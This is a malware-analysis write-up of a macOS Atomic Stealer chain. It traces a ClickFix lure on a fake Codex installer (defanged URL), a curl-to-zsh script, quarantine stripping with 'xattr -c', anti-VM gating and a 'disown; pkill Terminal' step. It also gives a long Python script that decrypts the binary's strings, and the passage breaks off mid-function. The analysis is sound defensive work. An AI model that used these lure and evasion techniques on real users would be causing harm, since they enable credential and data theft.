Introduction
This article analyzes an Atomic Stealer attack chain targeting macOS and deobfuscates the sample through binary analysis. The main focus is the binary analysis.
The information below includes details such as the destinations that live malware samples communicate with, so please handle it with due care.
What is Atomic Stealer?
This is covered in my previous article analyzing the beacon. This time, we analyze a sample that contains no beacon, following it from the initial infection phase onward.
Attack chain overview
I had an AI generate a simple diagram of this attack chain.

The flow is as follows:
- ClickFix tricks the user into executing a command
- The downloaded shell script runs
- The helper binary downloaded by the shell script runs
- osascript processes spawned by the helper binary collect sensitive information
- The collected information is exfiltrated
Details of each phase
From here, we analyze each phase.
ClickFix
On 4/26, I observed a site posing as a Codex installer at the following URL.
hxxps[:]//chatgpt-codex[.]gitlab[.]io/cdx/?

Clicking Download on this site brings up the following screen.

This is a typical ClickFix: it has the user invoke Terminal through a Spotlight shortcut on the Mac and execute a command.
A quick decode reveals a URL. The command passes this URL to curl to fetch its content, then pipes the result to zsh to execute the shell script.

Shell script
The following shell script is downloaded.

It is obfuscated, but decoding it shows that it executes the following commands.

It downloads an arm64 binary from a URL disguised as a JetBrains update and runs xattr -c to clear all extended file attributes. This strips the quarantine attribute, so macOS security mechanisms such as Gatekeeper no longer flag the binary.
The binary is then executed, and the main behavior begins.
helper binary
Let's analyze this arm64 binary in Binja.
Starting from start, we can see the main function.

Looking inside, two functions stand out first.

Let's take a closer look at decrypt_substitution_table.

At a glance, it applies byte operations to a 0x80-byte string: (x9_4 ^ 0x7c) - 0xf at even offsets and (x9_4 - 0x7c) ^ 0xf at odd offsets.
Reading the assembly quickly shows which region is being processed.
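As a minimal Python sketch of this alternating transform (the constants are the ones from the decompiled output above; masking each result to a byte is an assumption):

```python
def alt_decrypt(data: bytes) -> bytes:
    """Alternating even/odd byte transform seen in decrypt_substitution_table:
    even offsets use (b ^ 0x7c) - 0xf, odd offsets use (b - 0x7c) ^ 0xf."""
    out = bytearray()
    for i, b in enumerate(data):
        if i % 2 == 0:
            out.append(((b ^ 0x7C) - 0x0F) & 0xFF)  # even: XOR, then subtract
        else:
            out.append(((b - 0x7C) & 0xFF) ^ 0x0F)  # odd: subtract, then XOR
    return bytes(out)
```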

Starting from the region at 0x1000e8000, it executes add x23, 0x190, then loops three times with counter x24, subtracting 8 bytes from the memory address held in the x23 register and concatenating the data with memcpy. The b.ne exits once the counter reaches 0. The pointers sit at byte positions 0x10 apart.
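Assuming the table really is laid out as (pointer, size) pairs spaced 0x10 bytes apart, reading it can be sketched as follows (the function name and the sample values are illustrative):

```python
import struct

def read_pointer_table(raw: bytes, count: int = 3) -> list:
    """Read (pointer, size) 8-byte little-endian pairs spaced 0x10 apart,
    mirroring the x23/x24 loop described above. Offsets depend on the sample."""
    pairs = []
    for i in range(count):
        ptr, size = struct.unpack_from('<QQ', raw, i * 0x10)
        pairs.append((ptr, size))
    return pairs
```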


Applying the byte operations to this byte sequence produces a string: UXYBWOqcFMlVLwGj.
Examining another binary reveals a different logic as well.

The hex_decode function builds a table that defines a custom hex representation of 0-f. The idea looks like this:
| 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | A | B | C | D | E | F |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| U | X | Y | B | W | O | q | c | F | M | l | V | L | w | G | j |
This lets later stages convert their strings to hex. Any character outside this set maps to 0xff and is treated as invalid.
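With the alphabet above, the decode step can be sketched in Python (using the UXYBWOqcFMlVLwGj table recovered earlier):

```python
ALPHABET = "UXYBWOqcFMlVLwGj"          # index = nibble value 0x0..0xF
NIBBLE = {ord(c): i for i, c in enumerate(ALPHABET)}

def custom_hex_decode(s: bytes) -> bytes:
    """Turn pairs of alphabet characters into bytes; anything outside the
    alphabet corresponds to the 0xFF 'invalid' entries in the binary's table."""
    out = bytearray()
    for i in range(0, len(s) - 1, 2):
        hi, lo = NIBBLE.get(s[i]), NIBBLE.get(s[i + 1])
        if hi is None or lo is None:
            raise ValueError(f"invalid character at offset {i}")
        out.append((hi << 4) | lo)
    return bytes(out)
```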

Next, in main_payload, this hex data is XORed with 0xb4.

The next step is mostly similar processing.

decrypt_encode_blob_? behaves much like the earlier decrypt_substitution_table.

The output here, built from characters of UXYBWOqcFMlVLwGj, is converted to hex values with hex_decode.
base64_decode then receives that hex-decoded data along with the table produced by XORing the initial hex value with 0xb4. Following the internals, a characteristic 6-bit shift appears: base64-like behavior.
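Assuming the table is just a shuffled base64 alphabet, the decode can be sketched by translating each byte back to the standard alphabet and reusing the stdlib decoder (the 6-bit grouping then happens inside base64.b64decode):

```python
import base64

STD_B64 = b"ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"

def custom_base64_decode(encoded: bytes, table: bytes) -> bytes:
    """Map each byte through the custom 64-byte table back to the standard
    alphabet, re-pad, and decode. 'table' stands in for the 0xb4-XORed key data."""
    back = {b: STD_B64[i] for i, b in enumerate(table)}
    translated = bytes(back[b] for b in encoded if b in back)
    translated += b"=" * ((4 - len(translated) % 4) % 4)
    return base64.b64decode(translated)
```

With table = STD_B64 this degenerates to ordinary base64, which makes it easy to sanity-check.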

Continuing through main_payload, the decoded string is passed to exec_shell_command. Looking inside, it calls execl. Oh...

The result of that execution lands in the x0 register shown below. Spoiler: the binary runs anti-VM checks via osascript and changes its subsequent behavior based on the result, which is transformed and stored in the dynamic_key variable.

The same kind of decryption then continues for blob2 through blob5. The dynamic_key value from the earlier execution feeds into the decryption of blob2 through blob4, so if a VM is detected the decryption fails and the malware simply terminates. When it succeeds, new osascript payloads emerge from blob2 through blob4.
blob5 is always executed inside main_payload; it runs the disown; pkill Terminal command to detach the malware process from the ClickFix-spawned Terminal and then kill Terminal.
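The gating effect can be illustrated with a toy model. The actual per-sample algorithms differ, so a single-byte repeating XOR stands in for the real derivation here, and all names are hypothetical:

```python
def gated_decrypt(blob: bytes, dynamic_key: bytes,
                  alphabet=frozenset(b"UXYBWOqcFMlVLwGj")):
    """If dynamic_key (derived from the anti-VM osascript result) is wrong,
    decryption yields bytes outside the custom hex alphabet and we bail out,
    mirroring how the malware terminates when it detects a VM."""
    out = bytearray()
    for i, b in enumerate(blob):
        d = b ^ dynamic_key[i % len(dynamic_key)]
        if d not in alphabet:
            return None  # wrong key -> invalid output -> abort
        out.append(d)
    return bytes(out)
```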

So where are the decrypted osascripts from blob2-4 executed? Right here:

This runs the osascript that constitutes the Stealer's core behavior.
osascript decryption
Now that the flow is clear, I had an AI write a decryption script. The decryption algorithm for each blob differs from sample to sample, so the script brute-forces the parameters and produces readable output.
#!/usr/bin/env python3
"""統合復号スクリプト - バイナリ自動解析によるパラメータ抽出
使用方法: python decrypt.py <binary_path>
"""
import sys
import struct, base64
if len(sys.argv) < 2:
print(f"Usage: {sys.argv[0]} <binary_path>", file=sys.stderr)
sys.exit(1)
BINARY_PATH = sys.argv[1]
# =============================================================================
# Part 1: Mach-O Parser
# =============================================================================
class MachO:
"""ARM64 Mach-O / FAT binary parser"""
def __init__(self, path):
self.path = path
self.slice_offset = 0
self.segments = [] # [{name, vmaddr, vmsize, fileoff, filesize}]
self.sections = {} # "segment.section" -> {addr, size, fileoff}
self.entry_va = 0
self._find_arm64_slice()
self._parse_load_commands()
# --- FAT binary handling ---
def _find_arm64_slice(self):
with open(self.path, 'rb') as f:
magic = f.read(4)
if magic == b'\xcf\xfa\xed\xfe':
return
if magic in (b'\xca\xfe\xba\xbe', b'\xca\xfe\xba\xbf'):
is64 = (magic == b'\xca\xfe\xba\xbf')
nfat = struct.unpack('>I', f.read(4))[0]
for _ in range(nfat):
if is64:
ct, cs = struct.unpack('>2I', f.read(8))
off, sz = struct.unpack('>2Q', f.read(16))
f.read(8) # align, reserved
else:
ct, cs, off, sz, _ = struct.unpack('>5I', f.read(20))
if ct == 0x0100000C: # CPU_TYPE_ARM64
self.slice_offset = off
return
raise ValueError("ARM64 Mach-O slice not found")
# --- Load command parsing ---
def _parse_load_commands(self):
with open(self.path, 'rb') as f:
f.seek(self.slice_offset)
hdr = f.read(32)
_, _, _, _, ncmds, _, _, _ = struct.unpack('<8I', hdr)
for _ in range(ncmds):
pos = f.tell()
cmd, cmdsize = struct.unpack('<II', f.read(8))
if cmd == 0x19: # LC_SEGMENT_64
segname = f.read(16).split(b'\x00')[0].decode()
vmaddr, vmsize, fileoff, filesize = struct.unpack('<4Q', f.read(32))
_, _, nsects, _ = struct.unpack('<4I', f.read(16))
self.segments.append(dict(
name=segname, vmaddr=vmaddr, vmsize=vmsize,
fileoff=fileoff, filesize=filesize))
for _ in range(nsects):
raw = f.read(80)
sn = raw[:16].split(b'\x00')[0].decode()
sg = raw[16:32].split(b'\x00')[0].decode()
addr, size = struct.unpack('<2Q', raw[32:48])
offset = struct.unpack('<I', raw[48:52])[0]
key = f"{sg}.{sn}"
if key in self.sections:
key = f"{sg}.{sn}#{addr:x}"
self.sections[key] = dict(
addr=addr, size=size,
fileoff=self.slice_offset + offset, segment=sg)
elif cmd == 0x80000028: # LC_MAIN
entryoff = struct.unpack('<Q', f.read(8))[0]
text_seg = next(s for s in self.segments if s['name'] == '__TEXT')
self.entry_va = text_seg['vmaddr'] + entryoff
f.seek(pos + cmdsize)
# --- VA to file-offset (using segment mapping) ---
def va_to_offset(self, va):
for seg in self.segments:
if seg['vmaddr'] <= va < seg['vmaddr'] + seg['vmsize']:
return self.slice_offset + seg['fileoff'] + (va - seg['vmaddr'])
raise ValueError(f"VA 0x{va:x} not in any segment")
def read_va(self, va, size):
with open(self.path, 'rb') as f:
f.seek(self.va_to_offset(va))
return f.read(size)
def get_text_section(self):
for key, sec in self.sections.items():
if sec['segment'] == '__TEXT' and key.endswith('.__text'):
return sec
raise ValueError("__text section not found")
def get_const_sections(self):
return {k: v for k, v in self.sections.items()
if 'const' in k.lower() and v['segment'] == '__TEXT'}
def get_stubs_section(self):
for key, sec in self.sections.items():
if '__stubs' in key and 'helper' not in key:
return sec
return None
# =============================================================================
# Part 2: ARM64 Minimal Instruction Decoder
# =============================================================================
def decode_adrp(word, pc):
"""ADRP Xd, label → (rd, page_addr) or None"""
if (word & 0x9F000000) != 0x90000000:
return None
rd = word & 0x1F
immlo = (word >> 29) & 0x3
immhi = (word >> 5) & 0x7FFFF
imm = (immhi << 2) | immlo
if imm & (1 << 20):
imm -= (1 << 21)
page = ((pc & ~0xFFF) + (imm << 12)) & 0xFFFFFFFFFFFFFFFF
return rd, page
def decode_add_imm64(word):
"""ADD Xd, Xn, #imm (64-bit, no shift) → (rd, rn, imm) or None"""
if (word & 0xFFC00000) != 0x91000000:
return None
return word & 0x1F, (word >> 5) & 0x1F, (word >> 10) & 0xFFF
def decode_bl(word, pc):
"""BL target → target_va or None"""
if (word >> 26) != 0x25:
return None
imm26 = word & 0x3FFFFFF
if imm26 & (1 << 25):
imm26 -= (1 << 26)
return (pc + imm26 * 4) & 0xFFFFFFFFFFFFFFFF
def decode_movz(word):
"""MOVZ Wd/Xd, #imm{, lsl #shift} → (rd, value, sf) or None"""
if (word & 0x7F800000) not in (0x52800000, 0xD2800000):
return None
sf = (word >> 31) & 1
rd = word & 0x1F
imm16 = (word >> 5) & 0xFFFF
hw = (word >> 21) & 0x3
return rd, imm16 << (hw * 16), sf
def decode_movk(word):
"""MOVK Wd/Xd, #imm{, lsl #shift} → (rd, imm16, shift) or None"""
if (word & 0x7F800000) not in (0x72800000, 0xF2800000):
return None
rd = word & 0x1F
imm16 = (word >> 5) & 0xFFFF
hw = (word >> 21) & 0x3
return rd, imm16, hw * 16
# =============================================================================
# Part 3: Hex Table Auto-Detection
# =============================================================================
def find_hex_table(mo):
"""Scan __const for a 256-byte nibble lookup table (16 entries 0x00-0x0F, rest 0xFF).
Returns (table_va, hex_map dict, alphabet_string)."""
for _, sec in mo.get_const_sections().items():
data = mo.read_va(sec['addr'], sec['size'])
for i in range(len(data) - 255):
block = data[i:i + 256]
nibbles = set()
ff_count = 0
ok = True
for b in block:
if b == 0xFF:
ff_count += 1
elif b <= 0x0F:
nibbles.add(b)
else:
ok = False
break
if ok and nibbles == set(range(16)) and ff_count == 240:
va = sec['addr'] + i
hex_map = {}
alphabet = ['?'] * 16
for j, b in enumerate(block):
if b != 0xFF:
hex_map[j] = b # ascii_byte -> nibble
alphabet[b] = chr(j)
return va, hex_map, ''.join(alphabet)
raise ValueError("Hex nibble lookup table not found in __const")
# =============================================================================
# Part 4: Code Analysis — Data References, Function Calls, Sizes
# =============================================================================
def scan_text_section(mo):
"""Scan __text for ADRP+ADD data refs, BL calls, and MOVZ/MOVK immediates.
Returns dict with: data_refs, bl_calls, stubs_range."""
text = mo.get_text_section()
code = mo.read_va(text['addr'], text['size'])
code_va = text['addr']
stubs = mo.get_stubs_section()
stubs_range = (stubs['addr'], stubs['addr'] + stubs['size']) if stubs else (0, 0)
adrp_regs = {} # rd -> (page, pc)
data_refs = [] # (target_va, adrp_pc, add_pc)
bl_calls = [] # (caller_pc, target_va, is_import)
movz_at = {} # pc -> (rd, value)
for off in range(0, len(code) - 3, 4):
pc = code_va + off
w = struct.unpack('<I', code[off:off + 4])[0]
a = decode_adrp(w, pc)
if a:
adrp_regs[a[0]] = (a[1], pc)
continue
b = decode_add_imm64(w)
if b and b[1] in adrp_regs:
rd, rn, imm12 = b
page, adrp_pc = adrp_regs[rn]
full = page + imm12
data_refs.append((full, adrp_pc, pc))
continue
t = decode_bl(w, pc)
if t is not None:
is_imp = stubs_range[0] <= t < stubs_range[1]
bl_calls.append((pc, t, is_imp))
continue
mz = decode_movz(w)
if mz:
movz_at[pc] = (mz[0], mz[1])
continue
mk = decode_movk(w)
if mk:
rd, imm16, shift = mk
# Update most recent movz for same register
for prev_pc in sorted(movz_at, reverse=True):
if movz_at[prev_pc][0] == rd:
old_val = movz_at[prev_pc][1]
mask = ~(0xFFFF << shift) & 0xFFFFFFFFFFFFFFFF
movz_at[prev_pc] = (rd, (old_val & mask) | (imm16 << shift))
break
return dict(data_refs=data_refs, bl_calls=bl_calls,
stubs_range=stubs_range, movz_at=movz_at,
text_start=code_va, text_end=code_va + text['size'])
def find_function_starts(scan, entry_va=0):
"""Determine function start addresses from BL targets and entry point."""
text_s, text_e = scan['text_start'], scan['text_end']
starts = set()
for _, target, is_imp in scan['bl_calls']:
if not is_imp and text_s <= target < text_e:
starts.add(target)
starts.add(text_s) # first function
if text_s <= entry_va < text_e:
starts.add(entry_va) # OS entry point (_start)
return sorted(starts)
def group_refs_by_function(scan, func_starts):
"""Assign each data_ref to the function it appears in."""
funcs = {}
for i, fs in enumerate(func_starts):
fe = func_starts[i + 1] if i + 1 < len(func_starts) else scan['text_end']
refs = [(va, apc, addpc) for va, apc, addpc in scan['data_refs']
if fs <= apc < fe]
calls = [(cpc, tgt, imp) for cpc, tgt, imp in scan['bl_calls']
if fs <= cpc < fe]
funcs[fs] = dict(start=fs, end=fe, data_refs=refs, calls=calls)
return funcs
def _deref_pointer_table(mo, ref_va, tc_range, hex_excl):
"""Read (addr, size) pairs from a pointer table in __DATA_CONST.
The table alternates: [data_va:8, chunk_size:8, data_va:8, chunk_size:8, ...]"""
tc_start, tc_end = tc_range
chunks = []
# Determine if ref_va points to addr or size, align to pair boundary
try:
first = struct.unpack('<Q', mo.read_va(ref_va, 8))[0]
except Exception:
return []
if tc_start <= first < tc_end:
start = ref_va # starts at addr
elif 0 < first < 0x200000:
start = ref_va - 8 # starts at size → back up to addr
else:
return []
for off in range(0, 0x200, 16):
try:
raw = mo.read_va(start + off, 16)
addr = struct.unpack('<Q', raw[0:8])[0]
size = struct.unpack('<Q', raw[8:16])[0]
if (tc_start <= addr < tc_end and 0 < size < 0x200000
and not (hex_excl[0] <= addr < hex_excl[1])):
# Size consistency: stop if size differs >3x from first entry
if chunks:
ref_size = chunks[0][1]
if ref_size > 0 and (size > ref_size * 3 or size < ref_size // 3):
break
chunks.append((addr, size))
else:
break
except Exception:
break
return chunks
def find_memcpy_chunks(func_info, scan, mo, hex_table_va=0):
"""Extract (data_va, size) pairs from a function's data refs.
Handles both:
- Direct ADRP+ADD → __TEXT.__const (helper_2 style)
- Indirect ADRP+ADD → __DATA_CONST pointer table → __TEXT.__const (helper style)
"""
# Determine __TEXT.__const range
tc_start, tc_end = 0, 0
for key, sec in mo.sections.items():
if sec['segment'] == '__TEXT' and 'const' in key.lower():
s, e = sec['addr'], sec['addr'] + sec['size']
tc_start = s if tc_start == 0 else min(tc_start, s)
tc_end = max(tc_end, e)
if tc_start == 0:
return []
hex_excl = (hex_table_va, hex_table_va + 256) if hex_table_va else (0, 0)
text_sec = mo.get_text_section()
code_range = (text_sec['addr'], text_sec['addr'] + text_sec['size'])
# Collect all MOVZ w2/x2 in this function (memcpy size arguments)
func_movz_x2 = sorted(
[(mpc, val) for mpc, (rd, val) in scan['movz_at'].items()
if func_info['start'] <= mpc < func_info['end'] and rd == 2 and val > 0])
chunks = []
used_movz = set()
seen_addrs = set()
for ref_va, apc, addpc in func_info['data_refs']:
# Skip code-section refs and hex table refs
if code_range[0] <= ref_va < code_range[1]:
continue
if hex_excl[0] <= ref_va < hex_excl[1]:
continue
if tc_start <= ref_va < tc_end:
# --- Direct reference to __TEXT.__const ---
# Skip metadata area near start of __const (string descriptors etc.)
if ref_va < tc_start + 0x200:
continue
if ref_va in seen_addrs:
continue
seen_addrs.add(ref_va)
# Find nearest MOVZ x2 at or after the ADRP (size loaded before bl)
best_size, best_pc = None, None
for mpc, val in func_movz_x2:
if mpc >= apc and mpc not in used_movz:
best_size, best_pc = val, mpc
break
if best_pc:
used_movz.add(best_pc)
chunks.append((ref_va, best_size))
else:
# --- Possibly a pointer table in __DATA_CONST ---
ptrs = _deref_pointer_table(mo, ref_va, (tc_start, tc_end), hex_excl)
for addr, size in ptrs:
if addr not in seen_addrs:
seen_addrs.add(addr)
chunks.append((addr, size))
# Fill missing sizes using sorted gaps
if chunks and any(sz is None for _, sz in chunks):
sorted_c = sorted(chunks, key=lambda x: x[0])
known_gaps = []
# First pass: fill sizes from gaps to next chunk
for i, (va, sz) in enumerate(sorted_c):
if sz is not None:
continue
if i + 1 < len(sorted_c):
gap = sorted_c[i + 1][0] - va
if 0 < gap < 0x200000:
sorted_c[i] = (va, gap)
known_gaps.append(gap)
continue
# Second pass: fill remaining using most common gap or MOVZ
for i, (va, sz) in enumerate(sorted_c):
if sz is not None:
continue
if known_gaps:
from collections import Counter
sorted_c[i] = (va, Counter(known_gaps).most_common(1)[0][0])
else:
all_movz = [v for mpc, (rd, v) in scan['movz_at'].items()
if func_info['start'] <= mpc < func_info['end'] and v > 8]
if all_movz:
from collections import Counter
sorted_c[i] = (va, Counter(all_movz).most_common(1)[0][0])
chunks = sorted_c
return chunks
# =============================================================================
# Part 5: Algorithm Auto-Detection via Hex Table Validation
# =============================================================================
def _valid_hex_set(hex_map):
return set(hex_map.keys())
def try_single_xor(data, valid):
for k in range(256):
if all((b ^ k) in valid for b in data[:200]):
dec = bytes(b ^ k for b in data)
if all(c in valid for c in dec):
return ('single_xor', k), dec
return None, None
def try_running_xor(data, valid, multipliers=(0x1F,)):
for mul in multipliers:
for init in range(256):
key = init
ok = True
for b in data[:200]:
d = (b ^ key) & 0xFF
if d not in valid:
ok = False
break
key = (d + key * mul) & 0xFFFFFFFF
if ok:
out = bytearray()
key = init
for b in data:
d = (b ^ key) & 0xFF
out.append(d)
key = (d + key * mul) & 0xFFFFFFFF
if all(c in valid for c in out):
return ('running_xor', init, mul), bytes(out)
return None, None
def try_running_sum(data, valid, addends=(0x0D,)):
for addend in addends:
for init in range(256):
key = init
ok = True
for b in data[:200]:
d = (key + (~b & 0xFF)) & 0xFF
if d not in valid:
ok = False
break
key = (key + d + addend) & 0xFFFFFFFF
if ok:
out = bytearray()
key = init
for b in data:
d = (key + (~b & 0xFF)) & 0xFF
out.append(d)
key = (key + d + addend) & 0xFFFFFFFF
if all(c in valid for c in out):
return ('running_sum', init, addend), bytes(out)
return None, None
def _try_alt_form(data, valid, solve_even, solve_odd):
"""Try an alternating cipher form. For each constant C, intersect valid A values
across multiple test bytes. Returns (even_candidates, odd_candidates) or None."""
even_candidates = []
for c in range(256):
valid_a = None
for idx in range(0, min(20, len(data)), 2):
local_a = set()
for h in valid:
a = solve_even(data[idx], h, c)
if 0 <= (a & 0xFF) < 256:
local_a.add(a & 0xFF)
valid_a = local_a if valid_a is None else (valid_a & local_a)
if not valid_a:
break
if valid_a:
for a in valid_a:
even_candidates.append((a, c))
if not even_candidates:
return None
odd_candidates = []
for c in range(256):
valid_a = None
for idx in range(1, min(21, len(data)), 2):
local_a = set()
for h in valid:
a = solve_odd(data[idx], h, c)
if 0 <= (a & 0xFF) < 256:
local_a.add(a & 0xFF)
valid_a = local_a if valid_a is None else (valid_a & local_a)
if not valid_a:
break
if valid_a:
for a in valid_a:
odd_candidates.append((a, c))
if not odd_candidates:
return None
return even_candidates, odd_candidates
def try_alternating(data, valid):
"""Try 4 forms of alternating cipher. Returns (algo_info, decrypted) or (None, None)."""
forms = [
# (name, even: (b^A)-C, solve A from target h: A = b ^ ((h+C)&0xFF))
("xor_sub/sub_xor",
lambda b, h, c: b ^ ((h + c) & 0xFF), # even: (b^A)-C=h -> A=b^(h+C)
lambda b, h, c: (b - (h ^ c)) & 0xFF, # odd: (b-D)^E=h -> D=(b-(h^E))
lambda b, a, c: ((b ^ a) - c) & 0xFF,
lambda b, d, e: ((b - d) & 0xFF) ^ e),
("xor_sub/add_xor",
lambda b, h, c: b ^ ((h + c) & 0xFF),
lambda b, h, c: ((h ^ c) - b) & 0xFF, # odd: (b+D)^E=h -> D=(h^E)-b
lambda b, a, c: ((b ^ a) - c) & 0xFF,
lambda b, d, e: ((b + d) & 0xFF) ^ e),
("xor_add/sub_xor",
lambda b, h, c: b ^ ((h - c) & 0xFF), # even: (b^A)+C=h -> A=b^(h-C)
lambda b, h, c: (b - (h ^ c)) & 0xFF,
lambda b, a, c: ((b ^ a) + c) & 0xFF,
lambda b, d, e: ((b - d) & 0xFF) ^ e),
("xor_add/add_xor",
lambda b, h, c: b ^ ((h - c) & 0xFF),
lambda b, h, c: ((h ^ c) - b) & 0xFF,
lambda b, a, c: ((b ^ a) + c) & 0xFF,
lambda b, d, e: ((b + d) & 0xFF) ^ e),
]
for name, solve_even, solve_odd, apply_even, apply_odd in forms:
result = _try_alt_form(data, valid, solve_even, solve_odd)
if result is None:
continue
even_list, odd_list = result
# Validate each candidate pair on larger data
for ea, ec in even_list:
for od, oe in odd_list:
ok = True
for i in range(min(500, len(data))):
b = data[i]
d = apply_even(b, ea, ec) if i % 2 == 0 else apply_odd(b, od, oe)
if d not in valid:
ok = False
break
if ok:
out = bytearray()
for i, b in enumerate(data):
out.append(apply_even(b, ea, ec) if i % 2 == 0 else apply_odd(b, od, oe))
return (name, ea, ec, od, oe), bytes(out)
return None, None
def try_position_dependent(data, valid):
"""Try position-dependent cipher: ((i - i*8 + b + A) & 0xFF) ^ B"""
for xor_c in range(256):
for add_c in range(256):
ok = True
for i in range(min(200, len(data))):
d = (((i & 0xFF) - ((i * 8) & 0xFF) + data[i] + add_c) & 0xFF) ^ xor_c
if d not in valid:
ok = False
break
if ok:
out = bytearray()
for i, b in enumerate(data):
out.append((((i & 0xFF) - ((i * 8) & 0xFF) + b + add_c) & 0xFF) ^ xor_c)
if all(c in valid for c in out):
return ('position_dep', add_c, xor_c), bytes(out)
return None, None
def auto_detect_algorithm(data, valid):
"""Try all known algorithms and return (algo_info, decrypted_data).
Order: most specific first to avoid false-positive matches."""
# Alternating first (most specific — won't false-match simpler ciphers)
info, dec = try_alternating(data, valid)
if info:
return info, dec
# Then simpler ciphers
info, dec = try_single_xor(data, valid)
if info:
return info, dec
info, dec = try_running_xor(data, valid)
if info:
return info, dec
info, dec = try_running_sum(data, valid)
if info:
return info, dec
info, dec = try_position_dependent(data, valid)
if info:
return info, dec
return None, None
# =============================================================================
# Part 6: Custom Hex Decode & Hashtable Decode
# =============================================================================
def custom_hex_decode(data, hex_map):
out = bytearray()
length = len(data) & ~1 # ensure even length
for i in range(0, length, 2):
high = hex_map.get(data[i])
low = hex_map.get(data[i + 1])
if high is None or low is None:
raise ValueError(
f"Invalid hex at offset {i}: 0x{data[i]:02x} 0x{data[i+1]:02x}")
out.append((high << 4) | low)
return bytes(out)
def base64_decode(encoded, table):
B64 = b'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/'
ht = {b: B64[pos] for pos, b in enumerate(table)}
b64_str = bytearray(c for b in encoded for c in [ht.get(b)] if c is not None)
b64_str += b'=' * ((4 - len(b64_str) % 4) % 4)
return base64.b64decode(bytes(b64_str))
# =============================================================================
# Part 7: Pipeline Builder & Executor
# =============================================================================
def build_pipeline(mo, scan, hex_map, hex_table_va):
"""Trace from _start → main, analyze each sub-function, build decrypt pipeline."""
valid = _valid_hex_set(hex_map)
# Find function starts and filter cross-function ADRP+ADD pairs
func_starts = find_function_starts(scan, mo.entry_va)
# Post-filter: keep only data_refs where ADRP and ADD are in the same function
def _func_of(pc):
for i in range(len(func_starts) - 1, -1, -1):
if func_starts[i] <= pc:
return func_starts[i]
return 0
scan['data_refs'] = [(va, apc, addpc) for va, apc, addpc in scan['data_refs']
if _func_of(apc) == _func_of(addpc)]
func_map = group_refs_by_function(scan, func_starts)
# Trace _start → main: entry calls a function which is "main"
entry_func = func_map.get(mo.entry_va)
if not entry_func:
# Entry might not be at a function start; find the containing function
for fs in reversed(func_starts):
if fs <= mo.entry_va:
entry_func = func_map[fs]
break
# main = first non-import BL target from _start
main_va = None
for cpc, tgt, imp in sorted(scan['bl_calls']):
if entry_func and entry_func['start'] <= cpc < entry_func['end'] and not imp:
if scan['text_start'] <= tgt < scan['text_end']:
main_va = tgt
break
if main_va is None:
raise ValueError("Could not find main function from entry point")
main_func = func_map.get(main_va)
if not main_func:
raise ValueError(f"main at 0x{main_va:x} not in function map")
print(f"[INFO] _start=0x{mo.entry_va:x}, main=0x{main_va:x}")
# Collect sub-functions called from main (in call order, non-import only)
sub_funcs = []
seen = set()
for cpc, tgt, imp in sorted(main_func['calls']):
if not imp and tgt != main_va and tgt not in seen:
if tgt in func_map:
sub_funcs.append(func_map[tgt])
seen.add(tgt)
print(f"[INFO] main calls {len(sub_funcs)} sub-functions")
# For each sub-function, extract data chunks, validate each individually,
# and group valid chunks by detected algorithm.
analyzed = []
for sf in sub_funcs:
all_chunks = find_memcpy_chunks(sf, scan, mo, hex_table_va)
if not all_chunks:
continue
# For chunks with unknown size, try most common size from known chunks
known_sizes = [sz for _, sz in all_chunks if sz is not None and sz > 0]
if known_sizes:
from collections import Counter
fallback_size = Counter(known_sizes).most_common(1)[0][0]
else:
fallback_size = None
# Validate each chunk individually with auto-detection
by_algo = {} # algo_name -> [(cva, csz, algo, decrypted), ...]
for cva, csz in all_chunks:
if csz is None:
csz = fallback_size
if csz is None or csz < 4:
continue
try:
raw = mo.read_va(cva, csz)
algo, dec = auto_detect_algorithm(raw, valid)
if algo:
key = algo[0] # group by algorithm type name
by_algo.setdefault(key, []).append((cva, csz, algo, dec))
except Exception:
pass
if not by_algo:
continue
# Pick the algorithm group with the largest total byte count
best_group = max(by_algo.values(), key=lambda g: sum(sz for _, sz, _, _ in g))
# Build the analyzed entry from the best group
chunks_info = [(cva, csz) for cva, csz, _, _ in best_group]
total_dec = b"".join(dec for _, _, _, dec in best_group)
total_raw = sum(csz for _, csz, _, _ in best_group)
algo_info = best_group[0][2]
# Store raw data for re-decryption in post-XOR validation
raw_bytes = b""
for cva, csz in chunks_info:
raw_bytes += mo.read_va(cva, csz)
analyzed.append(dict(
func_va=sf['start'],
chunks=chunks_info,
raw_size=total_raw,
algo=algo_info,
decrypted=total_dec,
raw_data=raw_bytes,
))
# Debug: show rejected chunks
rejected = len(all_chunks) - len(chunks_info)
extra = f" (rejected {rejected}/{len(all_chunks)})" if rejected else ""
print(f" func 0x{sf['start']:x}: {len(chunks_info)} chunks, "
f"{total_raw} bytes, algo={algo_info[0]}{extra}")
return main_func, analyzed
def find_post_xor_and_key(analyzed, hex_map, mo):
"""Find the XOR key by trying all alternating cipher forms + all post-XOR values,
validated by base64_decode producing printable ASCII."""
key_entry = analyzed[0]
valid = _valid_hex_set(hex_map)
# Re-read raw key data from binary
raw_key = b""
for cva, csz in key_entry['chunks']:
raw_key += mo.read_va(cva, csz)
# Find a small validation blob (blob1 or similar)
threshold = _payload_threshold(analyzed, key_entry) if len(analyzed) > 1 else 999999
val_entry = None
for e in analyzed[1:]:
if e['raw_size'] < threshold and e.get('raw_data'):
val_entry = e
break
# All 4 alternating cipher forms (used for both key AND validation blob)
forms = [
("xor_sub/sub_xor",
lambda b, h, c: b ^ ((h + c) & 0xFF),
lambda b, h, c: (b - (h ^ c)) & 0xFF,
lambda b, a, c: ((b ^ a) - c) & 0xFF,
lambda b, d, e: ((b - d) & 0xFF) ^ e),
("xor_sub/add_xor",
lambda b, h, c: b ^ ((h + c) & 0xFF),
lambda b, h, c: ((h ^ c) - b) & 0xFF,
lambda b, a, c: ((b ^ a) - c) & 0xFF,
lambda b, d, e: ((b + d) & 0xFF) ^ e),
("xor_add/sub_xor",
lambda b, h, c: b ^ ((h - c) & 0xFF),
lambda b, h, c: (b - (h ^ c)) & 0xFF,
lambda b, a, c: ((b ^ a) + c) & 0xFF,
lambda b, d, e: ((b - d) & 0xFF) ^ e),
("xor_add/add_xor",
lambda b, h, c: b ^ ((h - c) & 0xFF),
lambda b, h, c: ((h ^ c) - b) & 0xFF,
lambda b, a, c: ((b ^ a) + c) & 0xFF,
lambda b, d, e: ((b + d) & 0xFF) ^ e),
]
def _decrypt_with_form(raw, apply_e, apply_o, ea, ec, od, oe):
"""Decrypt raw data with given alternating form and constants."""
